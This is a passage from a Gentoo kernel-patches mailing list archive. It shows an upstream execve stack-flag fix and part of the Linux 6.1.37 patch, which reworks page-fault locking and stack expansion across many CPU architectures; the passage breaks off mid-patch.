 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_mm-execve-mark-stack-as-growing-down.patch b/1800_mm-execve-mark-stack-as-growing-down.patch
new file mode 100644
index 00000000..7c71f7ea
--- /dev/null
+++ b/1800_mm-execve-mark-stack-as-growing-down.patch
@@ -0,0 +1,82 @@
+From 0140eae44accd0df8071de6487afe0921eb0d7fd Mon Sep 17 00:00:00 2001
+From: Linus Torvalds <torvalds@linux-foundation.org>
+Date: Sun, 2 Jul 2023 23:20:17 -0700
+Subject: execve: always mark stack as growing down during early stack setup
+
+commit f66066bc5136f25e36a2daff4896c768f18c211e upstream.
+
+While our user stacks can grow either down (all common architectures) or
+up (parisc and the ia64 register stack), the initial stack setup when we
+copy the argument and environment strings to the new stack at execve()
+time is always done by extending the stack downwards.
+
+But it turns out that in commit 8d7071af8907 ("mm: always expand the
+stack with the mmap write lock held"), as part of making the stack
+growing code more robust, 'expand_downwards()' was now made to actually
+check the vma flags:
+
+	if (!(vma->vm_flags & VM_GROWSDOWN))
+		return -EFAULT;
+
+and that meant that this execve-time stack expansion started failing on
+parisc, because on that architecture, the stack flags do not contain the
+VM_GROWSDOWN bit.
+
+At the same time the new check in expand_downwards() is clearly correct,
+and simplified the callers, so let's not remove it.
+
+The solution is instead to just codify the fact that yes, during
+execve(), the stack grows down.  This not only matches reality, it ends
+up being particularly simple: we already have special execve-time flags
+for the stack (VM_STACK_INCOMPLETE_SETUP) and use those flags to avoid
+page migration during this setup time (see vma_is_temporary_stack() and
+invalid_migration_vma()).
+
+So just add VM_GROWSDOWN to that set of temporary flags, and now our
+stack flags automatically match reality, and the parisc stack expansion
+works again.
+
+Note that the VM_STACK_INCOMPLETE_SETUP bits will be cleared when the
+stack is finalized, so we only add the extra VM_GROWSDOWN bit on
+CONFIG_STACK_GROWSUP architectures (ie parisc) rather than adding it in
+general.
+
+Link: https://lore.kernel.org/all/612eaa53-6904-6e16-67fc-394f4faa0e16@bell.net/
+Link: https://lore.kernel.org/all/5fd98a09-4792-1433-752d-029ae3545168@gmx.de/
+Fixes: 8d7071af8907 ("mm: always expand the stack with the mmap write lock held")
+Reported-by: John David Anglin <dave.anglin@bell.net>
+Reported-and-tested-by: Helge Deller <deller@gmx.de>
+Reported-and-tested-by: Guenter Roeck <linux@roeck-us.net>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
+---
+ include/linux/mm.h | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index f5b6ef943ede2..b8ed44f401b58 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -378,7 +378,7 @@ extern unsigned int kobjsize(const void *objp);
+ #endif /* CONFIG_HAVE_ARCH_USERFAULTFD_MINOR */
+ 
+ /* Bits set in the VMA until the stack is in its final location */
+-#define VM_STACK_INCOMPLETE_SETUP	(VM_RAND_READ | VM_SEQ_READ)
++#define VM_STACK_INCOMPLETE_SETUP (VM_RAND_READ | VM_SEQ_READ | VM_STACK_EARLY)
+ 
+ #define TASK_EXEC ((current->personality & READ_IMPLIES_EXEC) ? VM_EXEC : 0)
+ 
+@@ -400,8 +400,10 @@ extern unsigned int kobjsize(const void *objp);
+ 
+ #ifdef CONFIG_STACK_GROWSUP
+ #define VM_STACK	VM_GROWSUP
++#define VM_STACK_EARLY	VM_GROWSDOWN
+ #else
+ #define VM_STACK	VM_GROWSDOWN
++#define VM_STACK_EARLY	0
+ #endif
+ 
+ #define VM_STACK_FLAGS	(VM_STACK | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT)
+-- 
+cgit 
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-01 18:27 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-01 18:27 UTC (permalink / raw
  To: gentoo-commits

commit:     bee1a172fdd848464d7ea0df4de48778e3243e3c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jul  1 18:27:25 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jul  1 18:27:25 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bee1a172

Linux patch 6.1.37-gentoo

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1036_linux-6.1.37.patch | 2681 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2685 insertions(+)

diff --git a/0000_README b/0000_README
index 46c23470..d50ba74b 100644
--- a/0000_README
+++ b/0000_README
@@ -187,6 +187,10 @@ Patch:  1035_linux-6.1.36.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.36
 
+Patch:  1036_linux-6.1.37.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.37
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1036_linux-6.1.37.patch b/1036_linux-6.1.37.patch
new file mode 100644
index 00000000..62552bde
--- /dev/null
+++ b/1036_linux-6.1.37.patch
@@ -0,0 +1,2681 @@
+diff --git a/Makefile b/Makefile
+index cffb83d7a0fb6..26d73ce7e9267 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 36
++SUBLEVEL = 37
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/alpha/Kconfig b/arch/alpha/Kconfig
+index 97fce7386b002..d95d82abdf295 100644
+--- a/arch/alpha/Kconfig
++++ b/arch/alpha/Kconfig
+@@ -28,6 +28,7 @@ config ALPHA
+ 	select GENERIC_SMP_IDLE_THREAD
+ 	select HAVE_ARCH_AUDITSYSCALL
+ 	select HAVE_MOD_ARCH_SPECIFIC
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select ODD_RT_SIGACTION
+ 	select OLD_SIGSUSPEND
+diff --git a/arch/alpha/mm/fault.c b/arch/alpha/mm/fault.c
+index ef427a6bdd1ab..2b49aa94e4de3 100644
+--- a/arch/alpha/mm/fault.c
++++ b/arch/alpha/mm/fault.c
+@@ -119,20 +119,12 @@ do_page_fault(unsigned long address, unsigned long mmcsr,
+ 		flags |= FAULT_FLAG_USER;
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ 
+ 	/* Ok, we have a good vm_area for this memory access, so
+ 	   we can handle it.  */
+- good_area:
+ 	si_code = SEGV_ACCERR;
+ 	if (cause < 0) {
+ 		if (!(vma->vm_flags & VM_EXEC))
+@@ -189,6 +181,7 @@ retry:
+  bad_area:
+ 	mmap_read_unlock(mm);
+ 
++ bad_area_nosemaphore:
+ 	if (user_mode(regs))
+ 		goto do_sigsegv;
+ 
+diff --git a/arch/arc/Kconfig b/arch/arc/Kconfig
+index d9a13ccf89a3a..cb1074f74c3f1 100644
+--- a/arch/arc/Kconfig
++++ b/arch/arc/Kconfig
+@@ -41,6 +41,7 @@ config ARC
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_SYSCALL_TRACEPOINTS
+ 	select IRQ_DOMAIN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select OF
+ 	select OF_EARLY_FLATTREE
+diff --git a/arch/arc/mm/fault.c b/arch/arc/mm/fault.c
+index 5ca59a482632a..f59e722d147f9 100644
+--- a/arch/arc/mm/fault.c
++++ b/arch/arc/mm/fault.c
+@@ -113,15 +113,9 @@ void do_page_fault(unsigned long address, struct pt_regs *regs)
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (unlikely(address < vma->vm_start)) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN) || expand_stack(vma, address))
+-			goto bad_area;
+-	}
++		goto bad_area_nosemaphore;
+ 
+ 	/*
+ 	 * vm_area is good, now check permissions for this memory access
+@@ -161,6 +155,7 @@ retry:
+ bad_area:
+ 	mmap_read_unlock(mm);
+ 
++bad_area_nosemaphore:
+ 	/*
+ 	 * Major/minor page fault accounting
+ 	 * (in case of retry we only land here once)
+diff --git a/arch/arm/Kconfig b/arch/arm/Kconfig
+index a08c9d092a332..0202e48e7a207 100644
+--- a/arch/arm/Kconfig
++++ b/arch/arm/Kconfig
+@@ -122,6 +122,7 @@ config ARM
+ 	select HAVE_UID16
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_REL
+ 	select NEED_DMA_MAP_STATE
+ 	select OF_EARLY_FLATTREE if OF
+diff --git a/arch/arm/mm/fault.c b/arch/arm/mm/fault.c
+index de988cba9a4b1..b0db853103317 100644
+--- a/arch/arm/mm/fault.c
++++ b/arch/arm/mm/fault.c
+@@ -231,37 +231,11 @@ static inline bool is_permission_fault(unsigned int fsr)
+ 	return false;
+ }
+ 
+-static vm_fault_t __kprobes
+-__do_page_fault(struct mm_struct *mm, unsigned long addr, unsigned int flags,
+-		unsigned long vma_flags, struct pt_regs *regs)
+-{
+-	struct vm_area_struct *vma = find_vma(mm, addr);
+-	if (unlikely(!vma))
+-		return VM_FAULT_BADMAP;
+-
+-	if (unlikely(vma->vm_start > addr)) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			return VM_FAULT_BADMAP;
+-		if (addr < FIRST_USER_ADDRESS)
+-			return VM_FAULT_BADMAP;
+-		if (expand_stack(vma, addr))
+-			return VM_FAULT_BADMAP;
+-	}
+-
+-	/*
+-	 * ok, we have a good vm_area for this memory access, check the
+-	 * permissions on the VMA allow for the fault which occurred.
+-	 */
+-	if (!(vma->vm_flags & vma_flags))
+-		return VM_FAULT_BADACCESS;
+-
+-	return handle_mm_fault(vma, addr & PAGE_MASK, flags, regs);
+-}
+-
+ static int __kprobes
+ do_page_fault(unsigned long addr, unsigned int fsr, struct pt_regs *regs)
+ {
+ 	struct mm_struct *mm = current->mm;
++	struct vm_area_struct *vma;
+ 	int sig, code;
+ 	vm_fault_t fault;
+ 	unsigned int flags = FAULT_FLAG_DEFAULT;
+@@ -300,31 +274,21 @@ do_page_fault(unsigned long addr, unsigned int fsr, struct pt_regs *regs)
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+-	/*
+-	 * As per x86, we may deadlock here.  However, since the kernel only
+-	 * validly references user space from well defined areas of the code,
+-	 * we can bug out early if this is from code which shouldn't.
+-	 */
+-	if (!mmap_read_trylock(mm)) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->ARM_pc))
+-			goto no_context;
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above down_read_trylock() might have succeeded in
+-		 * which case, we'll have missed the might_sleep() from
+-		 * down_read()
+-		 */
+-		might_sleep();
+-#ifdef CONFIG_DEBUG_VM
+-		if (!user_mode(regs) &&
+-		    !search_exception_tables(regs->ARM_pc))
+-			goto no_context;
+-#endif
++	vma = lock_mm_and_find_vma(mm, addr, regs);
++	if (unlikely(!vma)) {
++		fault = VM_FAULT_BADMAP;
++		goto bad_area;
+ 	}
+ 
+-	fault = __do_page_fault(mm, addr, flags, vm_flags, regs);
++	/*
++	 * ok, we have a good vm_area for this memory access, check the
++	 * permissions on the VMA allow for the fault which occurred.
++	 */
++	if (!(vma->vm_flags & vm_flags))
++		fault = VM_FAULT_BADACCESS;
++	else
++		fault = handle_mm_fault(vma, addr & PAGE_MASK, flags, regs);
+ 
+ 	/* If we need to retry but a fatal signal is pending, handle the
+ 	 * signal first. We do not need to release the mmap_lock because
+@@ -355,6 +319,7 @@ retry:
+ 	if (likely(!(fault & (VM_FAULT_ERROR | VM_FAULT_BADMAP | VM_FAULT_BADACCESS))))
+ 		return 0;
+ 
++bad_area:
+ 	/*
+ 	 * If we are in kernel mode at this point, we
+ 	 * have no context to handle this fault with.
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 43ff7c7a3ac97..20ee745c118ae 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -211,6 +211,7 @@ config ARM64
+ 	select IRQ_DOMAIN
+ 	select IRQ_FORCED_THREADING
+ 	select KASAN_VMALLOC if KASAN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select NEED_DMA_MAP_STATE
+ 	select NEED_SG_DMA_LENGTH
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 2fef1fa93e7b6..6b6b8a82f2941 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -483,27 +483,14 @@ static void do_bad_area(unsigned long far, unsigned long esr,
+ #define VM_FAULT_BADMAP		((__force vm_fault_t)0x010000)
+ #define VM_FAULT_BADACCESS	((__force vm_fault_t)0x020000)
+ 
+-static vm_fault_t __do_page_fault(struct mm_struct *mm, unsigned long addr,
++static vm_fault_t __do_page_fault(struct mm_struct *mm,
++				  struct vm_area_struct *vma, unsigned long addr,
+ 				  unsigned int mm_flags, unsigned long vm_flags,
+ 				  struct pt_regs *regs)
+ {
+-	struct vm_area_struct *vma = find_vma(mm, addr);
+-
+-	if (unlikely(!vma))
+-		return VM_FAULT_BADMAP;
+-
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so we can handle
+ 	 * it.
+-	 */
+-	if (unlikely(vma->vm_start > addr)) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			return VM_FAULT_BADMAP;
+-		if (expand_stack(vma, addr))
+-			return VM_FAULT_BADMAP;
+-	}
+-
+-	/*
+ 	 * Check that the permissions on the VMA allow for the fault which
+ 	 * occurred.
+ 	 */
+@@ -535,6 +522,7 @@ static int __kprobes do_page_fault(unsigned long far, unsigned long esr,
+ 	unsigned long vm_flags;
+ 	unsigned int mm_flags = FAULT_FLAG_DEFAULT;
+ 	unsigned long addr = untagged_addr(far);
++	struct vm_area_struct *vma;
+ 
+ 	if (kprobe_page_fault(regs, esr))
+ 		return 0;
+@@ -585,31 +573,14 @@ static int __kprobes do_page_fault(unsigned long far, unsigned long esr,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+-	/*
+-	 * As per x86, we may deadlock here. However, since the kernel only
+-	 * validly references user space from well defined areas of the code,
+-	 * we can bug out early if this is from code which shouldn't.
+-	 */
+-	if (!mmap_read_trylock(mm)) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->pc))
+-			goto no_context;
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above mmap_read_trylock() might have succeeded in which
+-		 * case, we'll have missed the might_sleep() from down_read().
+-		 */
+-		might_sleep();
+-#ifdef CONFIG_DEBUG_VM
+-		if (!user_mode(regs) && !search_exception_tables(regs->pc)) {
+-			mmap_read_unlock(mm);
+-			goto no_context;
+-		}
+-#endif
++	vma = lock_mm_and_find_vma(mm, addr, regs);
++	if (unlikely(!vma)) {
++		fault = VM_FAULT_BADMAP;
++		goto done;
+ 	}
+ 
+-	fault = __do_page_fault(mm, addr, mm_flags, vm_flags, regs);
++	fault = __do_page_fault(mm, vma, addr, mm_flags, vm_flags, regs);
+ 
+ 	/* Quick path to respond to signals */
+ 	if (fault_signal_pending(fault, regs)) {
+@@ -628,6 +599,7 @@ retry:
+ 	}
+ 	mmap_read_unlock(mm);
+ 
++done:
+ 	/*
+ 	 * Handle the "normal" (no error) case first.
+ 	 */
+diff --git a/arch/csky/Kconfig b/arch/csky/Kconfig
+index adee6ab36862e..742009123fd5a 100644
+--- a/arch/csky/Kconfig
++++ b/arch/csky/Kconfig
+@@ -96,6 +96,7 @@ config CSKY
+ 	select HAVE_RSEQ
+ 	select HAVE_STACKPROTECTOR
+ 	select HAVE_SYSCALL_TRACEPOINTS
++	select LOCK_MM_AND_FIND_VMA
+ 	select MAY_HAVE_SPARSE_IRQ
+ 	select MODULES_USE_ELF_RELA if MODULES
+ 	select OF
+diff --git a/arch/csky/mm/fault.c b/arch/csky/mm/fault.c
+index e15f736cca4b4..a885518ce1dd2 100644
+--- a/arch/csky/mm/fault.c
++++ b/arch/csky/mm/fault.c
+@@ -97,13 +97,12 @@ static inline void mm_fault_error(struct pt_regs *regs, unsigned long addr, vm_f
+ 	BUG();
+ }
+ 
+-static inline void bad_area(struct pt_regs *regs, struct mm_struct *mm, int code, unsigned long addr)
++static inline void bad_area_nosemaphore(struct pt_regs *regs, struct mm_struct *mm, int code, unsigned long addr)
+ {
+ 	/*
+ 	 * Something tried to access memory that isn't in our memory map.
+ 	 * Fix it, but check if it's kernel or user first.
+ 	 */
+-	mmap_read_unlock(mm);
+ 	/* User mode accesses just cause a SIGSEGV */
+ 	if (user_mode(regs)) {
+ 		do_trap(regs, SIGSEGV, code, addr);
+@@ -238,20 +237,9 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	if (is_write(regs))
+ 		flags |= FAULT_FLAG_WRITE;
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, addr);
++	vma = lock_mm_and_find_vma(mm, addr, regs);
+ 	if (unlikely(!vma)) {
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= addr))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, addr))) {
+-		bad_area(regs, mm, code, addr);
++		bad_area_nosemaphore(regs, mm, code, addr);
+ 		return;
+ 	}
+ 
+@@ -259,11 +247,11 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it.
+ 	 */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	if (unlikely(access_error(regs, vma))) {
+-		bad_area(regs, mm, code, addr);
++		mmap_read_unlock(mm);
++		bad_area_nosemaphore(regs, mm, code, addr);
+ 		return;
+ 	}
+ 
+diff --git a/arch/hexagon/Kconfig b/arch/hexagon/Kconfig
+index 54eadf2651786..6726f4941015f 100644
+--- a/arch/hexagon/Kconfig
++++ b/arch/hexagon/Kconfig
+@@ -28,6 +28,7 @@ config HEXAGON
+ 	select GENERIC_SMP_IDLE_THREAD
+ 	select STACKTRACE_SUPPORT
+ 	select GENERIC_CLOCKEVENTS_BROADCAST
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select GENERIC_CPU_DEVICES
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+diff --git a/arch/hexagon/mm/vm_fault.c b/arch/hexagon/mm/vm_fault.c
+index f73c7cbfe3260..583b087271667 100644
+--- a/arch/hexagon/mm/vm_fault.c
++++ b/arch/hexagon/mm/vm_fault.c
+@@ -57,21 +57,10 @@ void do_page_fault(unsigned long address, long cause, struct pt_regs *regs)
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
+-	if (!vma)
+-		goto bad_area;
++	vma = lock_mm_and_find_vma(mm, address, regs);
++	if (unlikely(!vma))
++		goto bad_area_nosemaphore;
+ 
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-
+-	if (expand_stack(vma, address))
+-		goto bad_area;
+-
+-good_area:
+ 	/* Address space is OK.  Now check access rights. */
+ 	si_code = SEGV_ACCERR;
+ 
+@@ -140,6 +129,7 @@ good_area:
+ bad_area:
+ 	mmap_read_unlock(mm);
+ 
++bad_area_nosemaphore:
+ 	if (user_mode(regs)) {
+ 		force_sig_fault(SIGSEGV, si_code, (void __user *)address);
+ 		return;
+diff --git a/arch/ia64/mm/fault.c b/arch/ia64/mm/fault.c
+index ef78c2d66cdde..99a09abe1d2c5 100644
+--- a/arch/ia64/mm/fault.c
++++ b/arch/ia64/mm/fault.c
+@@ -110,10 +110,12 @@ retry:
+          * register backing store that needs to expand upwards, in
+          * this case vma will be null, but prev_vma will ne non-null
+          */
+-        if (( !vma && prev_vma ) || (address < vma->vm_start) )
+-		goto check_expansion;
++        if (( !vma && prev_vma ) || (address < vma->vm_start) ) {
++		vma = expand_stack(mm, address);
++		if (!vma)
++			goto bad_area_nosemaphore;
++	}
+ 
+-  good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	/* OK, we've got a good vm_area for this memory area.  Check the access permissions: */
+@@ -174,35 +176,9 @@ retry:
+ 	mmap_read_unlock(mm);
+ 	return;
+ 
+-  check_expansion:
+-	if (!(prev_vma && (prev_vma->vm_flags & VM_GROWSUP) && (address == prev_vma->vm_end))) {
+-		if (!vma)
+-			goto bad_area;
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			goto bad_area;
+-		if (REGION_NUMBER(address) != REGION_NUMBER(vma->vm_start)
+-		    || REGION_OFFSET(address) >= RGN_MAP_LIMIT)
+-			goto bad_area;
+-		if (expand_stack(vma, address))
+-			goto bad_area;
+-	} else {
+-		vma = prev_vma;
+-		if (REGION_NUMBER(address) != REGION_NUMBER(vma->vm_start)
+-		    || REGION_OFFSET(address) >= RGN_MAP_LIMIT)
+-			goto bad_area;
+-		/*
+-		 * Since the register backing store is accessed sequentially,
+-		 * we disallow growing it by more than a page at a time.
+-		 */
+-		if (address > vma->vm_end + PAGE_SIZE - sizeof(long))
+-			goto bad_area;
+-		if (expand_upwards(vma, address))
+-			goto bad_area;
+-	}
+-	goto good_area;
+-
+   bad_area:
+ 	mmap_read_unlock(mm);
++  bad_area_nosemaphore:
+ 	if ((isr & IA64_ISR_SP)
+ 	    || ((isr & IA64_ISR_NA) && (isr & IA64_ISR_CODE_MASK) == IA64_ISR_CODE_LFETCH))
+ 	{
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 903096bd87f88..51d738ac12e55 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -107,6 +107,7 @@ config LOONGARCH
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN if !SMP
+ 	select IRQ_FORCED_THREADING
+ 	select IRQ_LOONGARCH_CPU
++	select LOCK_MM_AND_FIND_VMA
+ 	select MMU_GATHER_MERGE_VMAS if MMU
+ 	select MODULES_USE_ELF_RELA if MODULES
+ 	select NEED_PER_CPU_EMBED_FIRST_CHUNK
+diff --git a/arch/loongarch/mm/fault.c b/arch/loongarch/mm/fault.c
+index 1ccd53655cab0..b829ab911a17b 100644
+--- a/arch/loongarch/mm/fault.c
++++ b/arch/loongarch/mm/fault.c
+@@ -166,22 +166,18 @@ static void __kprobes __do_page_fault(struct pt_regs *regs,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
+-	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (!expand_stack(vma, address))
+-		goto good_area;
++	vma = lock_mm_and_find_vma(mm, address, regs);
++	if (unlikely(!vma))
++		goto bad_area_nosemaphore;
++	goto good_area;
++
+ /*
+  * Something tried to access memory that isn't in our memory map..
+  * Fix it, but check if it's kernel or user first..
+  */
+ bad_area:
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
+ 	do_sigsegv(regs, write, address, si_code);
+ 	return;
+ 
+diff --git a/arch/m68k/mm/fault.c b/arch/m68k/mm/fault.c
+index 4d2837eb3e2a3..6f62af8e293a0 100644
+--- a/arch/m68k/mm/fault.c
++++ b/arch/m68k/mm/fault.c
+@@ -105,8 +105,9 @@ retry:
+ 		if (address + 256 < rdusp())
+ 			goto map_err;
+ 	}
+-	if (expand_stack(vma, address))
+-		goto map_err;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto map_err_nosemaphore;
+ 
+ /*
+  * Ok, we have a good vm_area for this memory access, so
+@@ -193,10 +194,12 @@ bus_err:
+ 	goto send_sig;
+ 
+ map_err:
++	mmap_read_unlock(mm);
++map_err_nosemaphore:
+ 	current->thread.signo = SIGSEGV;
+ 	current->thread.code = SEGV_MAPERR;
+ 	current->thread.faddr = address;
+-	goto send_sig;
++	return send_fault_sig(regs);
+ 
+ acc_err:
+ 	current->thread.signo = SIGSEGV;
+diff --git a/arch/microblaze/mm/fault.c b/arch/microblaze/mm/fault.c
+index 5c40c3ebe52f7..a409bb3f09f7f 100644
+--- a/arch/microblaze/mm/fault.c
++++ b/arch/microblaze/mm/fault.c
+@@ -192,8 +192,9 @@ retry:
+ 			&& (kernel_mode(regs) || !store_updates_sp(regs)))
+ 				goto bad_area;
+ 	}
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto bad_area_nosemaphore;
+ 
+ good_area:
+ 	code = SEGV_ACCERR;
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index 2f5835e300a8f..7b0856c76c9ad 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -94,6 +94,7 @@ config MIPS
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN if 64BIT || !SMP
+ 	select IRQ_FORCED_THREADING
+ 	select ISA if EISA
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_REL if MODULES
+ 	select MODULES_USE_ELF_RELA if MODULES && 64BIT
+ 	select PERF_USE_VMALLOC
+diff --git a/arch/mips/mm/fault.c b/arch/mips/mm/fault.c
+index a27045f5a556d..d7878208bd3fa 100644
+--- a/arch/mips/mm/fault.c
++++ b/arch/mips/mm/fault.c
+@@ -99,21 +99,13 @@ static void __do_page_fault(struct pt_regs *regs, unsigned long write,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ /*
+  * Ok, we have a good vm_area for this memory access, so
+  * we can handle it..
+  */
+-good_area:
+ 	si_code = SEGV_ACCERR;
+ 
+ 	if (write) {
+diff --git a/arch/nios2/Kconfig b/arch/nios2/Kconfig
+index a582f72104f39..1fb78865a4593 100644
+--- a/arch/nios2/Kconfig
++++ b/arch/nios2/Kconfig
+@@ -16,6 +16,7 @@ config NIOS2
+ 	select HAVE_ARCH_TRACEHOOK
+ 	select HAVE_ARCH_KGDB
+ 	select IRQ_DOMAIN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select OF
+ 	select OF_EARLY_FLATTREE
+diff --git a/arch/nios2/mm/fault.c b/arch/nios2/mm/fault.c
+index edaca0a6c1c1c..71939fb28c2e7 100644
+--- a/arch/nios2/mm/fault.c
++++ b/arch/nios2/mm/fault.c
+@@ -86,27 +86,14 @@ asmlinkage void do_page_fault(struct pt_regs *regs, unsigned long cause,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ 
+-	if (!mmap_read_trylock(mm)) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->ea))
+-			goto bad_area_nosemaphore;
+ retry:
+-		mmap_read_lock(mm);
+-	}
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ /*
+  * Ok, we have a good vm_area for this memory access, so
+  * we can handle it..
+  */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	switch (cause) {
+diff --git a/arch/openrisc/mm/fault.c b/arch/openrisc/mm/fault.c
+index b4762d66e9efe..e3ad46d02fbdd 100644
+--- a/arch/openrisc/mm/fault.c
++++ b/arch/openrisc/mm/fault.c
+@@ -127,8 +127,9 @@ retry:
+ 		if (address + PAGE_SIZE < regs->sp)
+ 			goto bad_area;
+ 	}
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto bad_area_nosemaphore;
+ 
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so
